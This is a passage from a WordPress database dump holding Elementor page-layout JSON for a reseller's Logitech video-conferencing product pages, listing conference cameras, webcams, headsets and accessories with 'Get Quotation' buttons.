Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"08edb2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"85c2829\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-screen-share.png\",\"id\":1391}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f3f660b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech Screen Share<\\/h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"77dadd4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b20ef35\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3211191\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-expansion-microphones.png\",\"id\":1392}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2a65808\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP EXPANSION MICS<\\/h3><p>Add-on mics for larger groups<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6a71d0d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac7c83c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f6834a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"13a33a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5b6e717\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech SmartDock Flex<\\/h3><p>Expansion Kit for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5014200\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"366eb59\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dc59d5f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-15m-extended-cable.png\",\"id\":1401}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e222e61\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 15M EXTENDED CABLE<\\/h3><p>15 meter cable for video conferences in larger rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b6bbdef\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b7c0191\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8128e7a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-10m-extended-cable.png\",\"id\":1404}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a506052\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 10M EXTENDED CABLE<\\/h3><p>10 meter cable, ideal for large conference rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"da882ae\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"509c931\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2438d41\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f231a38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bc953c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-expansion-mics.png\",\"id\":1406}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"db20012\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EXPANSION MIC FOR MEETUP<\\/h3><p>Add-on microphone for huddle room flexibility<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"33673e4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"cfcc955\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(5371,16,'_elementor_version','0.4'),(5373,2918,'_wp_page_template','template-fullwidth.php'),(5374,2918,'_elementor_edit_mode','builder'),(5375,2918,'_elementor_template_type','post'),(5376,2918,'_elementor_data','[{\"id\":\"71c39ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e477157\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":38.387,\"content_position\":\"center\"},\"elements\":[{\"id\":\"1e2e480\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO CONFERENCING\\u200b\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"f051e18\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":61.61},\"elements\":[{\"id\":\"5e28b2d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad4243\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ab857b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3866d6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONFERENCE CAMERAS<\\/h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0326f20\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"56b446e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"963d60b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"eeaf14e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP<\\/h3><p>Video conferencing for mid to large-sized meeting rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c880fed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1e67209\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a768bb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-system-b2b-pdp.png\",\"id\":1249}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"59f66f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally<\\/h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5e9935e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a473ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":-18},\"elements\":[{\"id\":\"009aa7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6572b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MeetUp<\\/h4><p>All-in-One ConferenceCam with 120\\u00b0 field of view and integrated audio, perfect for small conference and huddle rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ea3deb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2042b97\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2e8e54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1b201c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-connect.png\",\"id\":1318}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"17f6307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CONNECT<\\/h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ed3411\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a08e65\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93261d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-bcc950.png\",\"id\":1319}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0e23f40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BCC950<\\/h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe5fab\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"67ffddd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"177327c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ptz-pro-2-camera.png\",\"id\":1321}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff04afc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PTZ PRO 2<\\/h3><p>HD 1080p video camera with enhanced pan\\/tilt and zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e3ff14a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a021238\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5be05f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aea13c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"790f00c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"322d778\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally Camera<\\/h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe363c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"3862603\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e81386\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"51d763e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7410c4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>VC ROOM SOLUTIONS<\\/h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b363b98\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"35986ce0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"64637ebe\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"product-details-ctn\\\"><h2 style=\\\"text-align: center;\\\">\\u00a0<\\/h2><p><img class=\\\"wp-image-1327 size-medium aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/smartdock-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong><span class=\\\"product-name\\\">SMARTDOCK<\\/span><\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><h2 style=\\\"text-align: center;\\\">WEBCAMS<\\/h2><p class=\\\"lead\\\" style=\\\"text-align: center;\\\">Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.<\\/p><table><tbody><tr><td width=\\\"200\\\"><p><img class=\\\"alignnone wp-image-1332 size-medium\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/briopictograms-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech Brio<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"aligncenter wp-image-1334 size-medium\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c930e-webcam-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech C9230e<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone wp-image-1336 size-medium\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c925e-webcam-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech C925e<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><tr><td colspan=\\\"3\\\" width=\\\"601\\\"><p>\\u00a0<img class=\\\"wp-image-1354 size-medium aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/b525-pdp-2017-refresh-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech B525<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><\\/tbody><\\/table><\\/div><h2>\\u00a0<\\/h2><h2 style=\\\"text-align: center;\\\">HEADSETS<\\/h2><p class=\\\"lead\\\" style=\\\"text-align: center;\\\">Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.<\\/p><p><img class=\\\"wp-image-1364 size-medium aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/h570e-headset-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Logitech H570e Headset<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><h2 style=\\\"text-align: center;\\\">VIDEO COLLABORATION ACCESSORIES<\\/h2><table><tbody><tr><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1386\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/smartdock-extender-box.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong><span class=\\\"product-name\\\">SmartDock Extender Box<\\/span><\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1391\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-screen-share.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Screen Share<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1392\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-expansion-microphones.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\"><strong>Group Expansion Mics<\\/strong><\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><tr><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1397\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Logitech SmartDock Flex<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1401\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-15m-extended-cable.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Group 15m Extended Cable<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><td width=\\\"200\\\"><p><img class=\\\"alignnone size-full wp-image-1404\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-10m-extended-cable.png\\\" alt=\\\"\\\" width=\\\"393\\\" height=\\\"393\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Group 10m Extended Cable<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><tr><td colspan=\\\"3\\\" width=\\\"601\\\"><p><img class=\\\"aligncenter wp-image-1406 size-medium\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-expansion-mics-300x300.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"300\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">MeetUp Expansion Mic<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"3\\\"]<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5377,2918,'_elementor_version','0.4'),(5387,2920,'_wp_page_template','template-fullwidth.php'),(5388,2920,'_elementor_edit_mode','builder'),(5389,2920,'_elementor_template_type','post'),(5390,2920,'_elementor_data','[{\"id\":\"71c39ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e477157\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":38.387,\"content_position\":\"center\"},\"elements\":[{\"id\":\"1e2e480\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO CONFERENCING\\u200b\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"f051e18\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":61.61},\"elements\":[{\"id\":\"5e28b2d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad4243\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ab857b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3866d6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONFERENCE CAMERAS<\\/h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0326f20\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"56b446e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"963d60b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"eeaf14e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP<\\/h3><p>Video conferencing for mid to large-sized meeting rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c880fed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1e67209\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a768bb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-system-b2b-pdp.png\",\"id\":1249}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"59f66f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally<\\/h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5e9935e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a473ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":-18},\"elements\":[{\"id\":\"009aa7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6572b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MeetUp<\\/h4><p>All-in-One ConferenceCam with 120\\u00b0 field of view and integrated audio, perfect for small conference and huddle rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ea3deb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2042b97\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2e8e54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1b201c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-connect.png\",\"id\":1318}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"17f6307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CONNECT<\\/h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ed3411\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get 